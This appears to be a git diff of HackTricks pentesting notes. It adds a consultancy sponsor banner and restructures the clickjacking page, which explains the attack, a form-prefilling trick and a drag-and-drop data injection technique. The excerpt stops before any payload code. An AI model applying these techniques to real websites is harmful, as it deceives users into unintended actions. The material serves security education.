+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
@@ -147,5 +170,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/pentesting-web/clickjacking.md b/pentesting-web/clickjacking.md
index be0e6cc9a..ea72f9516 100644
--- a/pentesting-web/clickjacking.md
+++ b/pentesting-web/clickjacking.md
@@ -1,4 +1,4 @@
-
+# Clickjacking
@@ -16,20 +16,27 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %}
+
-# What is Clickjacking
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
+## What is Clickjacking
Clickjacking is an attack that **tricks** a **user** into **clicking** a webpage **element** which is **invisible** or disguised as another element. This can cause users to unwittingly download malware, visit malicious web pages, provide credentials or sensitive information, transfer money, or purchase products online. (From [here](https://www.imperva.com/learn/application-security/clickjacking/)).
-## Prepopulate forms trick
+### Prepopulate forms trick
Sometimes is possible to **fill the value of fields of a form using GET parameters when loading a page**. An attacker may abuse this behaviours to fill a form with arbitrary data and send the clickjacking payload so the user press the button Submit.
-## Populate form with Drag\&Drop
+### Populate form with Drag\&Drop
If you need the user to **fill a form** but you don't want to directly ask him to write some specific information (like your email or and specific password that you know), you can just ask him to **Drag\&Drop** something that will write your controlled data like in [**this example**](https://lutfumertceylan.com.tr/posts/clickjacking-acc-takeover-drag-drop/).
-## Basic Payload
+### Basic Payload
```markup